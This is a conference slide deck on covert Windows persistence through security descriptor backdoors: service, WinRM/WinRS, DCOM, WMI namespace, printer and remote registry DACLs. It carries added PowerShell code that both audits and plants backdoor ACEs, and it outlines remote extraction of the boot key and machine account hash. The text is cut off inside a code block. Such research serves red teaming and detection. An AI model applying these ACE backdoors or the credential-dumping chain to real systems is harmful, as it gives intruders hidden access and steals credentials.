An ACE in the Hole
Stealthy Host Persistence via
Security Descriptors
Who We Are
× @tifkin_ / @enigma0x3 / @harmj0y
× Red teamers/researchers at
SpecterOps
× Code on code on code
× Cons on cons on cons
2
What This Is
× Offensive applications
× Intro to securable objects
× Our Research Process
× Securable object takeover primitives
× Case studies/demos
× Defense
3
1.
Offensive
Applications
WHY this is useful
4
“As an offensive
researcher, if you can
dream it, someone has
likely already done
it...and that someone
isn’t the kind of person
who speaks at security
cons”
5
Matt “f’ing” Graeber
BlackHat 2015
6
7
Why Care (really)?
× It’s often difficult to determine whether a
specific security descriptor misconfiguration
was set maliciously or configured by accident
× These changes also have a minimal/different
forensic footprint and grant:
× Bug longevity! Privesc! Persistence!
× They might already be on your system ;)
× Living off the land++ (existed since NT was
born!)
8
Big Point(s)
× Most defenders are not aware of this
general persistence approach, much less
how to find and remediate it!
× You don’t need to leave malicious
code/logic on a system to regain access!
× What if this change was made to an
organization’s “gold image”?
9
Responsibly Evil ;)
× Also, you don’t need to set the
principal/trustee (who has the rights) to
S-1-1-0!
× Security descriptor backdoors can be set
for specific trustees in a targeted manner
so exposure in the environment is
minimized
10
¯\_(ツ)_/¯
× “if an attacker has code execution on your
system, you’re screwed already, so who
cares“
× “You need admin rights to do this, this is
stupid!“
× To this we say: domain joined boxes
!= isolated home systems
× we guess the defensive industry should just
pack up and leave…
11
2.
Intro to
Securable
Objects
Security Descriptors 101
12
What is a
“Securable Object”?
A windows object
that can have a
security descriptor
SECURITY_DESCRIPTOR
https://msdn.microsoft.com/en-us/library/windows/hardware/ff556610(v=vs.85).aspx
14
15
[Diagram: the DACL and its ACEs]
Where are these
descriptors?
× Found in the registry, the file system, in
the kernel, ntds.dit....
× Really depends on the type of object
× Finding what objects are securable, much
less exactly where their descriptors are
located, isn’t as easy as you’d think...
16
From DACLs to
SACLs
17
× Access Control List (ACL) is basically shorthand for
the DACL/SACL superset
× An object’s Discretionary Access Control List
(DACL) and System Access Control List (SACL) are
ordered collections of Access Control Entries
(ACEs)
× DACL - What principals/trustees have what rights over
the object
× The SACL - Specifies how to audit access to the object
Standard vs.
Object-Specific
18
http://searchwindowsserver.techtarget.com/feature/The-structure-of-an-ACE
More on DACLs
19
× Null DACL != empty DACL (null: everyone gets full access; empty: no one does)
× Inheritance… can be a >_<
× General interpretation:
× Explicit Deny
× Explicit Allow
× Inherited Deny
× Inherited Allow
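The three points on this slide in runnable form. This is an added example, not code from the talk or its authors: it parses an SDDL string into ACEs, tells a NULL DACL from an empty one, and checks the ordering listed above. The SDDL strings at the bottom are constructed, and the S-1-5-21-... SID is a placeholder that will not resolve on your host.

```powershell
# Added example, not from the slides: parse an SDDL string into its ACEs, tell a NULL
# DACL from an empty one, and check the "explicit deny, explicit allow, inherited deny,
# inherited allow" ordering. The sample SDDL strings below are constructed; the
# S-1-5-21-... SID is a placeholder.

function Resolve-SidName {
    param([Parameter(Mandatory)][System.Security.Principal.SecurityIdentifier]$Sid)
    try   { $Sid.Translate([System.Security.Principal.NTAccount]).Value }
    catch { $Sid.Value }      # unresolvable (foreign domain, deleted account): keep the raw SID
}

function ConvertFrom-Sddl {
    param([Parameter(Mandatory)][string]$Sddl)
    $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor($Sddl)
    if ($null -eq $sd.DiscretionaryAcl) {
        # No DACL at all (no "D:" section, or "D:NO_ACCESS_CONTROL"): Everyone gets full access.
        return [pscustomobject]@{ DaclState = 'NULL (everyone has full access)'; Aces = @() }
    }
    $aces = foreach ($ace in $sd.DiscretionaryAcl) {
        [pscustomobject]@{
            Type      = $ace.AceType                       # AccessAllowed / AccessDenied / *Object
            Trustee   = Resolve-SidName $ace.SecurityIdentifier
            Sid       = $ace.SecurityIdentifier.Value
            Mask      = '0x{0:X8}' -f $ace.AccessMask
            Inherited = $ace.IsInherited                   # the "ID" flag in SDDL
        }
    }
    # "D:" with no entries is an empty DACL: present, but grants nothing to anyone.
    $state = if ($sd.DiscretionaryAcl.Count -eq 0) { 'EMPTY (no one has access)' } else { 'PRESENT' }
    [pscustomobject]@{ DaclState = $state; Aces = @($aces) }
}

function Test-CanonicalDacl {
    # $true when the ACEs follow the order on the slide. Out-of-order DACLs are legal on
    # disk but are evaluated first-match-wins, so an allow placed before a deny silently
    # wins; that is worth flagging when hunting for tampering.
    param([Parameter(Mandatory)][string]$Sddl)
    $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor($Sddl)
    if ($null -eq $sd.DiscretionaryAcl) { return $true }
    $last = -1
    foreach ($ace in $sd.DiscretionaryAcl) {
        $rank = 0
        if ($ace.IsInherited) { $rank += 2 }
        if ($ace.AceType -notin 'AccessDenied', 'AccessDeniedObject') { $rank += 1 }
        if ($rank -lt $last) { return $false }
        $last = $rank
    }
    $true
}

# Constructed inputs:
$canonical  = 'O:BAG:BAD:(D;;GA;;;S-1-5-21-1-2-3-1001)(A;;GA;;;BA)(A;ID;GR;;;BU)'
$outOfOrder = 'O:BAG:BAD:(A;;GA;;;BU)(D;;GA;;;S-1-5-21-1-2-3-1001)'
$nullDacl   = 'O:BAG:BA'
$emptyDacl  = 'O:BAG:BAD:'

ConvertFrom-Sddl $canonical | Select-Object -ExpandProperty Aces | Format-Table
foreach ($s in $canonical, $outOfOrder) { '{0,-5} {1}' -f (Test-CanonicalDacl $s), $s }
(ConvertFrom-Sddl $nullDacl).DaclState
(ConvertFrom-Sddl $emptyDacl).DaclState
```

RawSecurityDescriptor is used deliberately: unlike CommonSecurityDescriptor it does not canonicalise the DACL on load, so an out-of-order or otherwise odd descriptor is shown as it really is on the object.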
Our Securable
Object Research
Methodology
20
Our Research
Approach
Objects accessible from user mode, with a focus on ones
usable for persistence/lateral movement
1. Discover securable objects
2. Offline and online security descriptor enumeration
3. Analyze the access mask
a. What object-specific rights are there (if any)?
b. What rights permit persistence/lateral movement?
4. Operational weaponization and detection
21
1. Discovering
Securable Objects
× Windows documentation lists about 20-30 securable
objects*
× We’ve identified 70+! (There’s *many* more)
× Microsoft Protocol Specifications
× Very useful for RPC servers
× Find-RegistrySecurityDescriptors.ps1
22
*https://msdn.microsoft.com/en-us/library/windows/desktop/aa379557(v=vs.85).aspx
23
Find-RegistrySecurityDescriptors
2. Online vs Offline
Security Descriptors
× Where do objects get their security descriptor?
× Offline - Security descriptor derived from
registry, file, ntds.dit, etc.
× Online - Security descriptor is in memory
Our approach to enumeration:
× Locally as an unprivileged user
× Locally as a privileged user
× Remotely as an unprivileged user
× Remotely as a privileged user
24
Existing Tooling
× Use existing tools
× Accesschk.exe
× WindowsDACLEnumProject
× Google’s sandbox analysis tools
× NtObjectManager woot woot!
× BloodHound
× Most do not distinguish between
online/offline security descriptors
× Implication: How do you know if an object
has been modified after creation?
25
Enumeration Caveats
× “Online” vs offline security descriptors
× Necessary token privileges
× Some objects are “invisible” to user-mode
enumeration
× Kernel private namespaces
× Does an object with no name have a security
descriptor?
× https://googleprojectzero.blogspot.co.uk/2014/10/did-man-with-no-name-feel-insecure.html
26
3.
Access Mask
Analysis
Taking back what’s yours ;)
27
Deriving Access
Mask Meaning
× MSDN Documentation
× Technical Specifications
× Reversing
× Trial and error ¯\_(ツ)_/¯
28
Generic Object
Takeover Primitives
× Attacker is owner (implies WRITE_DAC)
× Attacker has WRITE_DAC/WRITE_OWNER
× Attacker has STANDARD_RIGHTS_ALL
× Attacker has GENERIC_ALL*
× Object has NULL security descriptor (implies
Everyone has GENERIC_ALL)
29
* Depends on how the object maps the generic right to standard/object-specific rights.
Usually this includes WRITE_DAC/WRITE_OWNER, but doesn’t have to
Object-specific
Takeover Primitives
× Each securable object can define its own
rights
× Example: Process Rights
× PROCESS_CREATE_PROCESS
× PROCESS_CREATE_THREAD
× PROCESS_SUSPEND_RESUME
× PROCESS_QUERY_INFORMATION
× PROCESS_TERMINATE
× The specific object and its rights determine
its offensive usefulness (priv esc, lateral
movement, persistence, etc.)
30
4.
Operational
Weaponization
and Detection
Case studies of certain securable objects
31
Service Control
Manager RPC Server
× “RPC server that enables service
configuration and control of service
programs.” - MS-SCMR
× Applicable Securable Objects
× Service Control Manager Server
× Windows Services
32
SCM Server
Applicable Rights
33
SC_MANAGER_CONNECT - Permits connecting to the service control manager
SC_MANAGER_CREATE_SERVICE - Ability to add a new service
SC_MANAGER_ENUMERATE_SERVICE - List out services
By default, unauthenticated users can enumerate
the security descriptor of the SCM Server!
34
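An added example covering the SCM/service case and the two earlier points (decoding an access mask against the object's rights table, and telling the "online" descriptor from the "offline" one). It is not the authors' code. It assumes an elevated local shell, the documented SCM and service rights tables, and the service names at the bottom are only illustrations.

```powershell
# Added example, not the authors' code: decode service / SCM access masks against the
# documented rights tables, flag entries that amount to a takeover, and compare the
# "online" descriptor the SCM enforces (sc.exe sdshow) with the "offline" copy under
# HKLM\SYSTEM\CurrentControlSet\Services\<name>\Security.

$ServiceRights = [ordered]@{
    0x00000001 = 'SERVICE_QUERY_CONFIG';   0x00000002 = 'SERVICE_CHANGE_CONFIG'   # binPath/ServiceDll = code exec
    0x00000004 = 'SERVICE_QUERY_STATUS';   0x00000008 = 'SERVICE_ENUMERATE_DEPENDENTS'
    0x00000010 = 'SERVICE_START';          0x00000020 = 'SERVICE_STOP'
    0x00000040 = 'SERVICE_PAUSE_CONTINUE'; 0x00000080 = 'SERVICE_INTERROGATE'
    0x00000100 = 'SERVICE_USER_DEFINED_CONTROL'
    0x00010000 = 'DELETE';    0x00020000 = 'READ_CONTROL'
    0x00040000 = 'WRITE_DAC'; 0x00080000 = 'WRITE_OWNER'; 0x10000000 = 'GENERIC_ALL'
}
$ScmRights = [ordered]@{
    0x00000001 = 'SC_MANAGER_CONNECT';           0x00000002 = 'SC_MANAGER_CREATE_SERVICE'
    0x00000004 = 'SC_MANAGER_ENUMERATE_SERVICE'; 0x00000008 = 'SC_MANAGER_LOCK'
    0x00000010 = 'SC_MANAGER_QUERY_LOCK_STATUS'; 0x00000020 = 'SC_MANAGER_MODIFY_BOOT_CONFIG'
    0x00020000 = 'READ_CONTROL'; 0x00040000 = 'WRITE_DAC'; 0x00080000 = 'WRITE_OWNER'; 0x10000000 = 'GENERIC_ALL'
}
# Generic takeover primitives from the slides plus the two object-specific ones that matter here.
$TakeoverRights = 'WRITE_DAC', 'WRITE_OWNER', 'GENERIC_ALL', 'SERVICE_CHANGE_CONFIG', 'SC_MANAGER_CREATE_SERVICE'

function Expand-AccessMask {
    param([int]$Mask, [System.Collections.IDictionary]$Table)
    $u = [BitConverter]::ToUInt32([BitConverter]::GetBytes($Mask), 0)   # bit 31 set => negative Int32
    foreach ($bit in $Table.Keys) { if (($u -band [uint32]$bit) -eq [uint32]$bit) { $Table[$bit] } }
}

function Get-OnlineSddl {
    # What the SCM is enforcing right now. sc.exe prints a blank line, the SDDL, a blank line.
    param([Parameter(Mandatory)][string]$Name)
    $out = @(& sc.exe sdshow $Name | Where-Object { $_ -match '\S' })
    if ($LASTEXITCODE -ne 0) { throw "sc.exe sdshow $Name failed: $($out -join ' ')" }
    $out[0].Trim()
}

function Get-OfflineSddl {
    # The persisted copy. It exists only if someone set an explicit SD (SetServiceObjectSecurity /
    # sc.exe sdset); with no value the SCM applies its default, so $null here is normal.
    param([Parameter(Mandatory)][string]$Name)
    $bytes = (Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\$Name\Security" -ErrorAction SilentlyContinue).Security
    if (-not $bytes) { return $null }
    (New-Object System.Security.AccessControl.RawSecurityDescriptor($bytes, 0)).GetSddlForm('Access')
}

function Find-TakeoverAce {
    param([Parameter(Mandatory)][string]$Sddl, [System.Collections.IDictionary]$Table = $ServiceRights)
    $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor($Sddl)
    foreach ($ace in $sd.DiscretionaryAcl) {
        if ($ace.AceType -ne [System.Security.AccessControl.AceType]::AccessAllowed) { continue }
        $rights = @(Expand-AccessMask -Mask $ace.AccessMask -Table $Table)
        $hits   = @($rights | Where-Object { $_ -in $TakeoverRights })
        if ($hits.Count -gt 0) {
            [pscustomobject]@{
                Sid       = $ace.SecurityIdentifier.Value
                Takeover  = $hits -join ','
                AllRights = $rights -join ','
                Inherited = $ace.IsInherited
            }
        }
    }
}

function Compare-ServiceSddl {
    # Normalise both through RawSecurityDescriptor so only the DACL part is compared. Drift means
    # the strings differ: either a runtime-only change (sdset on the live service) or a
    # registry-only one (edited offline, e.g. in a gold image). Confirm by eye; SDDL has aliases.
    param([Parameter(Mandatory)][string]$Name)
    $online  = (New-Object System.Security.AccessControl.RawSecurityDescriptor((Get-OnlineSddl $Name))).GetSddlForm('Access')
    $offline = Get-OfflineSddl $Name
    [pscustomobject]@{
        Service = $Name
        Online  = $online
        Offline = if ($offline) { $offline } else { '<none: SCM default>' }
        Drift   = ($null -ne $offline) -and ($online -ne $offline)
    }
}

# Usage (illustrative):
Find-TakeoverAce -Sddl (Get-OnlineSddl scmanager) -Table $ScmRights      # who may create services?
foreach ($svc in Get-Service) {
    try {
        Find-TakeoverAce -Sddl (Get-OnlineSddl $svc.Name) |
            Where-Object { $_.Sid -notin 'S-1-5-18', 'S-1-5-32-544' } |    # skip SYSTEM and Administrators
            Select-Object @{ n = 'Service'; e = { $svc.Name } }, Sid, Takeover
    } catch { Write-Warning $_ }
}
Compare-ServiceSddl -Name Spooler
```

The offline/online split is the point: a tool that only calls QueryServiceObjectSecurity sees the same descriptor whether it was set at install time or by an attacker last week, whereas the registry value tells you an explicit descriptor was written at all.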
SCM Demo
https://youtu.be/tETNO22zVKM
WinRM/WinRS
× Windows Remote
Management/Windows Remote Shell
× Provides the ability to remotely interface
with a host
× Think PowerShell Remoting
× Create backdoored ACE and apply it to
either the WinRM or WinRS DACL
× Or both!!
× Defined user (via SID) will be able to
remotely interact with the host without
admin privs
35
WinRM/WinRS
× Security Descriptor can be accessed by pulling the
SecurityDescriptorSddl property of
Get-PSSessionConfiguration
× Build the new DACL via DiscretionaryAcl.AddAccess()
of System.Security.AccessControl.CommonSecurityDescriptor
× PowerShell Remoting:
× Set the new DACL via -SecurityDescriptorSddl of
Set-PSSessionConfiguration
× WinRS
× Set WSMan:\localhost\Service\RootSDDL to the
new DACL via Set-Item
36
WinRM/WinRS
× Already weaponized here:
https://github.com/ssOleg/Useful_code/blob/master/Set-RemoteShellAccess.ps1
× In 2014….
× Takes a domain SID and adds an ACE for
that SID to both PowerShell Remoting and
WinRS DACLs
× Allows that specific user/group to remotely
interface with WinRM/WinRS without
having any additional privilege
37
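The three-step procedure from the previous slides as functions, plus the audit a defender would run against the same two descriptors. Added example; it is neither the authors' code nor ssOleg's script. Assumed: an elevated local shell, the stock "Microsoft.PowerShell" endpoint, and a placeholder SID; the "expected trustee" list is a heuristic for a default install, not a Microsoft-documented set.

```powershell
# Added example, not the authors' code and not ssOleg's script: the steps from the slides
# as functions, plus an audit of who is currently allowed in. Assumptions: an elevated
# local shell, the default "Microsoft.PowerShell" endpoint, and a placeholder SID.

function Get-RemotingSddl {
    # Both descriptors the slides mention: the PowerShell endpoint and the WinRS root SDDL.
    [ordered]@{
        'PSSessionConfiguration/Microsoft.PowerShell' = (Get-PSSessionConfiguration -Name Microsoft.PowerShell).SecurityDescriptorSddl
        'WSMan:\localhost\Service\RootSDDL'            = (Get-Item -Path WSMan:\localhost\Service\RootSDDL).Value
    }
}

function Add-RemotingAce {
    # Step 2 of the slide: CommonSecurityDescriptor keeps the DACL canonical while adding.
    param(
        [Parameter(Mandatory)][string]$Sddl,
        [Parameter(Mandatory)][string]$Sid,          # e.g. 'S-1-5-21-1-2-3-1105' (placeholder)
        [int]$AccessMask = 0x10000000                # GENERIC_ALL, the "GA" the default grants to BA
    )
    $sd = New-Object System.Security.AccessControl.CommonSecurityDescriptor($false, $false, $Sddl)
    $sd.DiscretionaryAcl.AddAccess(
        [System.Security.AccessControl.AccessControlType]::Allow,
        (New-Object System.Security.Principal.SecurityIdentifier($Sid)),
        $AccessMask,
        [System.Security.AccessControl.InheritanceFlags]::None,
        [System.Security.AccessControl.PropagationFlags]::None)
    $sd.GetSddlForm([System.Security.AccessControl.AccessControlSections]::All)
}

function Set-RemotingSddl {
    # Step 3: apply to PowerShell Remoting (this restarts WinRM) and/or to WinRS.
    param([Parameter(Mandatory)][string]$Sddl, [switch]$PSRemoting, [switch]$WinRS)
    if ($PSRemoting) { Set-PSSessionConfiguration -Name Microsoft.PowerShell -SecurityDescriptorSddl $Sddl -Force }
    if ($WinRS)      { Set-Item -Path WSMan:\localhost\Service\RootSDDL -Value $Sddl -Force }
}

function Get-RemotingTrustees {
    # Lists every allow ACE and marks trustees outside the stock set. The stock set is a
    # heuristic for a default install: Administrators, Remote Management Users, INTERACTIVE.
    param([string[]]$Expected = @('S-1-5-32-544', 'S-1-5-32-580', 'S-1-5-4'))
    foreach ($entry in (Get-RemotingSddl).GetEnumerator()) {
        if (-not $entry.Value) { continue }
        $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor($entry.Value)
        foreach ($ace in $sd.DiscretionaryAcl) {
            if ($ace.AceType -ne [System.Security.AccessControl.AceType]::AccessAllowed) { continue }
            [pscustomobject]@{
                Object     = $entry.Key
                Sid        = $ace.SecurityIdentifier.Value
                Mask       = '0x{0:X8}' -f $ace.AccessMask
                Unexpected = $ace.SecurityIdentifier.Value -notin $Expected
            }
        }
    }
}

# Usage (illustrative; the SID is a placeholder):
# $current = (Get-RemotingSddl)['PSSessionConfiguration/Microsoft.PowerShell']
# $new     = Add-RemotingAce -Sddl $current -Sid 'S-1-5-21-1-2-3-1105'
# Set-RemotingSddl -Sddl $new -PSRemoting -WinRS
Get-RemotingTrustees | Where-Object Unexpected
```

Note that the endpoint SDDL and the WinRS RootSDDL are independent gates: a trustee added to only one of them can use only that path, which is why the slide says "or both".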
DCOM
× Distributed Component Object Model
× Been around since 1996… >_<
× Secured via Launch and Activation
Permissions
× Local/Remote, perms reside in the registry
× Can you use interesting DCOM
applications to get code-execution?
× Applications with “ExecuteShellCommand()”
× Backdoor your favorite DCOM application for a
specific user/group’s SID :-)
38
DCOM
× Access is determined via machine-wide permissions first
and then application specific permissions
× Add target user/group to allow machine-wide Remote
Activation/Launch Permissions
× Instead of editing the Default, just edit the Limit
× HKLM:\Software\Microsoft\Ole\MachineLaunchRestriction
× (A;;CCRPLC;;;$SID)
× Backdoor a specific DCOM Application for a domain
user/group
× HKLM:\Software\Classes\AppID\{GUID}\LaunchPermission
× HKLM:\Software\Classes\AppID\{GUID}\AccessPermission
× Requires: SeTakeOwnershipPrivilege, SeRestorePrivilege,
SeSecurityPrivilege if installing locally
39
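DCOM permissions are "offline" descriptors: REG_BINARY blobs in the registry. The added example below (not the authors' code) decodes the machine-wide limits this slide edits and every per-AppID LaunchPermission, using the DCOM-specific meaning of the low mask bits, and flags remote launch/activation granted outside the built-in DCOM groups. The SDDL ACE from the slide is decoded the same way, with a placeholder SID; the "expected" SID list is a heuristic, not a Microsoft default table.

```powershell
# Added example, not the authors' code: decode DCOM launch/access descriptors from the
# registry and report remote launch/activation granted to unexpected trustees.

$LaunchRights = [ordered]@{ 1 = 'COM_RIGHTS_EXECUTE'; 2 = 'LocalLaunch'; 4 = 'RemoteLaunch'; 8 = 'LocalActivation'; 16 = 'RemoteActivation' }
$AccessRights = [ordered]@{ 1 = 'COM_RIGHTS_EXECUTE'; 2 = 'LocalAccess'; 4 = 'RemoteAccess' }
# Administrators, Distributed COM Users, Performance Log Users, SYSTEM, SELF (heuristic)
$ExpectedDcomSids = 'S-1-5-32-544', 'S-1-5-32-562', 'S-1-5-32-559', 'S-1-5-18', 'S-1-5-10'

function ConvertFrom-DcomSd {
    # Accepts the REG_BINARY bytes or an SDDL string (so the slide's ACE can be decoded too).
    param([Parameter(Mandatory)]$Descriptor, [System.Collections.IDictionary]$Table = $LaunchRights)
    $sd = if ($Descriptor -is [string]) { New-Object System.Security.AccessControl.RawSecurityDescriptor($Descriptor) }
          else { New-Object System.Security.AccessControl.RawSecurityDescriptor([byte[]]$Descriptor, 0) }
    foreach ($ace in $sd.DiscretionaryAcl) {
        $rights = @(foreach ($bit in $Table.Keys) { if ($ace.AccessMask -band $bit) { $Table[$bit] } })
        [pscustomobject]@{
            Type   = $ace.AceType
            Sid    = $ace.SecurityIdentifier.Value
            Rights = $rights -join ','
            Remote = [bool]($rights -match '^Remote')
        }
    }
}

function Get-DcomMachineLimits {
    # The "Limits" the slide edits. An absent value means the OS default is in effect.
    $ole = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Ole'
    foreach ($name in 'MachineLaunchRestriction', 'MachineAccessRestriction') {
        $table = if ($name -eq 'MachineLaunchRestriction') { $LaunchRights } else { $AccessRights }
        if (-not $ole.$name) { "$name not set: the OS default is in effect"; continue }
        ConvertFrom-DcomSd -Descriptor $ole.$name -Table $table |
            Select-Object @{ n = 'Value'; e = { $name } }, Type, Sid, Rights, Remote
    }
}

function Find-RemoteLaunchGrant {
    # Per-app descriptors live under AppID\{GUID}; a missing LaunchPermission means the
    # machine-wide DefaultLaunchPermission applies, so there is nothing to decode for it.
    foreach ($key in Get-ChildItem -Path 'HKLM:\SOFTWARE\Classes\AppID' -ErrorAction SilentlyContinue) {
        $bytes = $key.GetValue('LaunchPermission')
        if (-not $bytes) { continue }
        ConvertFrom-DcomSd -Descriptor $bytes |
            Where-Object { $_.Type -eq 'AccessAllowed' -and $_.Remote -and $_.Sid -notin $ExpectedDcomSids } |
            Select-Object @{ n = 'AppId'; e = { $key.PSChildName } }, Sid, Rights
    }
}

# The slide's ACE decoded (placeholder SID). In SDDL CC=0x1, LC=0x4, RP=0x10, which DCOM reads
# as COM_RIGHTS_EXECUTE | RemoteLaunch | RemoteActivation.
ConvertFrom-DcomSd -Descriptor 'D:(A;;CCRPLC;;;S-1-5-21-1-2-3-1105)'
Get-DcomMachineLimits
Find-RemoteLaunchGrant
```

Writing a modified limit back is the reverse path: RawSecurityDescriptor.GetBinaryForm() into a byte array, then Set-ItemProperty -Type Binary on the same value, which is why the slide lists the take-ownership/restore/security privileges for the local case.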
DCOM
40
https://msdn.microsoft.com/en-us/library/windows/desktop/ms679714(v=vs.85).aspx
41
DCOM Demo
https://youtu.be/e-tYtfmcoWk
WMI NameSpaces
× Contains a collection of WMI classes that
host various methods/properties
× Each namespace has associated DACLs
× Windows checks the DCOM machine-wide
launch permissions for the first stage of
access
× If successful, the DACLs on the WMI namespace
are then checked
× Backdoor a NameSpace that contains a class
with a useful method
× Create() method of Win32_Process, for example
42
WMI NameSpaces
× Call GetSecurityDescriptor() on the target WMI
namespace (local requires SeSecurityPrivilege)
× Use Win32_Ace to set our Access Mask and
flags
× Use Win32_Trustee to assign the user
× Set the “Trustee” property of Win32_Ace to our
Win32_Trustee object
× Add our new ACE to the target namespace
DACL: $NameSpaceACL.DACL +=
$Ace.PSObject.ImmediateBaseObject
× Call SetSecurityDescriptor() with the newly
updated NameSpace object to set it
43
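The six steps above as one function, with a decoder that shows which trustees can execute methods remotely in a namespace. Added example, not the authors' code; it follows the Win32_Ace/Win32_Trustee procedure the slide describes. The namespace, the computer name and the SID are placeholders, and the bit values come from the WMI namespace rights documented for __SystemSecurity.

```powershell
# Added example, not the authors' code: audit a WMI namespace DACL and add an ACE to it
# the way the slide describes. Placeholders: $Sid, $Namespace, $ComputerName.

$WmiRights = [ordered]@{
    0x00001 = 'WBEM_ENABLE'          # "Enable Account"
    0x00002 = 'WBEM_METHOD_EXECUTE'  # call methods, e.g. Win32_Process.Create
    0x00004 = 'WBEM_FULL_WRITE_REP'
    0x00008 = 'WBEM_PARTIAL_WRITE_REP'
    0x00010 = 'WBEM_WRITE_PROVIDER'
    0x00020 = 'WBEM_REMOTE_ACCESS'   # "Remote Enable"
    0x20000 = 'READ_CONTROL'
    0x40000 = 'WRITE_DAC'            # may rewrite the namespace DACL itself
}

function Get-WmiNamespaceAces {
    param([string]$Namespace = 'root\cimv2', [string]$ComputerName = '.')
    # __SystemSecurity is a singleton, hence the "=@" instance path.
    $res = Invoke-WmiMethod -Namespace $Namespace -Path '__systemsecurity=@' -Name GetSecurityDescriptor -ComputerName $ComputerName
    if ($res.ReturnValue -ne 0) { throw "GetSecurityDescriptor failed: $($res.ReturnValue)" }
    foreach ($ace in $res.Descriptor.DACL) {
        $rights = @(foreach ($bit in $WmiRights.Keys) { if ($ace.AccessMask -band $bit) { $WmiRights[$bit] } })
        [pscustomobject]@{
            Type       = if ($ace.AceType -eq 0) { 'Allow' } else { 'Deny' }
            Trustee    = if ($ace.Trustee.Domain) { "$($ace.Trustee.Domain)\$($ace.Trustee.Name)" } else { $ace.Trustee.SIDString }
            Sid        = $ace.Trustee.SIDString
            Rights     = $rights -join ','
            RemoteExec = (($ace.AccessMask -band 0x22) -eq 0x22)   # MethodExecute + RemoteEnable
            Inherits   = [bool]($ace.AceFlags -band 0x2)           # CONTAINER_INHERIT_ACE: flows to sub-namespaces
        }
    }
}

function Add-WmiNamespaceAce {
    param(
        [Parameter(Mandatory)][string]$Sid,          # placeholder trustee, e.g. 'S-1-5-21-1-2-3-1105'
        [string]$Namespace = 'root\cimv2',
        [string]$ComputerName = '.',
        [int]$AccessMask = 0x23                      # Enable | MethodExecute | RemoteEnable
    )
    $res = Invoke-WmiMethod -Namespace $Namespace -Path '__systemsecurity=@' -Name GetSecurityDescriptor -ComputerName $ComputerName
    if ($res.ReturnValue -ne 0) { throw "GetSecurityDescriptor failed: $($res.ReturnValue)" }
    $acl = $res.Descriptor

    $trustee = ([wmiclass]'Win32_Trustee').CreateInstance()
    $trustee.SidString = $Sid
    $ace = ([wmiclass]'Win32_Ace').CreateInstance()
    $ace.AccessMask = $AccessMask
    $ace.AceFlags   = 0x2        # CONTAINER_INHERIT_ACE
    $ace.AceType    = 0          # ACCESS_ALLOWED_ACE_TYPE
    $ace.Trustee    = $trustee

    $acl.DACL += $ace.PSObject.ImmediateBaseObject
    $set = Invoke-WmiMethod -Namespace $Namespace -Path '__systemsecurity=@' -Name SetSecurityDescriptor `
                            -ArgumentList $acl.PSObject.ImmediateBaseObject -ComputerName $ComputerName
    if ($set.ReturnValue -ne 0) { throw "SetSecurityDescriptor failed: $($set.ReturnValue)" }
}

# Usage (illustrative):
Get-WmiNamespaceAces | Where-Object RemoteExec
# Add-WmiNamespaceAce -Sid 'S-1-5-21-1-2-3-1105' -ComputerName 'WS01'
```

The RemoteExec column is the one to read: a trustee needs both WBEM_METHOD_EXECUTE and WBEM_REMOTE_ACCESS on the namespace (after passing the DCOM machine-wide launch check) before a remote Win32_Process.Create() succeeds, and the inherit flag decides whether that grant also covers every child namespace.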
WMI NameSpaces
44
https://msdn.microsoft.com/en-us/library/aa394679(v=vs.85).aspx
45
WMI Namespace
Demo
https://youtu.be/C1OpX_n7HlY
Printers
× Securable Objects
a. Print Servers
HKLM\SYSTEM\CurrentControlSet\Control\Print\ServerSecurityDescriptor
b. Printer Objects
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print\Printers\<PrinterName>\Security
c. Print Jobs - Not very interesting offensively
Specifications: MS-RPRN, MS-PAR, MS-PAN, MS-PRSOD
46
47
Print Server Control - Spooler
48
Print Server Control - Drivers
49
Get-NetPrinter
50
Get-NetShare Additions
Remote Registry
× Allows permitted users/groups to access the
registry remotely via .NET/Win32 API
× [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey()
× The RemoteRegistry service has to be enabled
and the calling user has to have access
× By default in Windows 7/10, this service is
disabled
× Remote access to the registry == ability to
dump hashes (among other things) 😈
51
51
Remote Registry
× Imagine this scenario: Remotely dumping an
endpoint’s machine account hash as an
unprivileged user
× Remotely backdoor the winreg key for a specified
user/group
× Located at
HKLM:\SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg
× The DACL on this key decides who is allowed to
connect via remote registry
52
Remote Registry
× Can be accomplished via WMI’s StdRegProv
provider
× Call SetSecurityDescriptor() with an ACE that defines the
user/permissions for the backdoor
× Why not just use StdRegProv?
× Dumping the machine account hash requires obtaining
various Registry Key classes.
× Can only be obtained via RegQueryInfoKey()
× Use Set-Service to remotely set the service
StartupType to “Manual”
× Set-Service -Name "RemoteRegistry" -ComputerName
$Computer -StartupType "Manual"
53
Remote Registry
× Remotely take ownership of the SECURITY registry hive
and add an ACE to the DACL for the backdoor user
× As that user, remotely call RegConnectRegistry()
× Open the required keys and pull the Key’s Class
× SYSTEM\CurrentControlSet\Control\Lsa\<JD,Skew1,GBG,DATA>
× RegOpenKeyEx(), RegQueryInfoKey()
× Combine these Class values and compute the BootKey
× Use the BootKey to decrypt the LSA key
× Use the LSA key to decrypt the machine account hash
54
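The read side of the chain on this and the previous two slides, carried through to the boot key. Added example, not the authors' code. The key classes are metadata that StdRegProv and the .NET registry API never expose, so RegQueryInfoKey is reached through P/Invoke; OpenRemoteBaseKey is .NET's wrapper for RegConnectRegistry. Decrypting the LSA key and the machine account secret is not implemented here. The host name is a placeholder, assumed to be a box where the caller passes the winreg key DACL and the RemoteRegistry service is running.

```powershell
# Added example, not the authors' code: list who the winreg key admits, then read the four
# Lsa key classes remotely and un-permute them into the 16-byte boot key.

Add-Type -Namespace Win32 -Name Advapi32 -MemberDefinition @'
[DllImport("advapi32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
public static extern int RegQueryInfoKey(
    Microsoft.Win32.SafeHandles.SafeRegistryHandle hKey,
    System.Text.StringBuilder lpClass, ref uint lpcchClass,
    IntPtr lpReserved, IntPtr lpcSubKeys, IntPtr lpcbMaxSubKeyLen, IntPtr lpcbMaxClassLen,
    IntPtr lpcValues, IntPtr lpcbMaxValueNameLen, IntPtr lpcbMaxValueLen,
    IntPtr lpcbSecurityDescriptor, IntPtr lpftLastWriteTime);
'@

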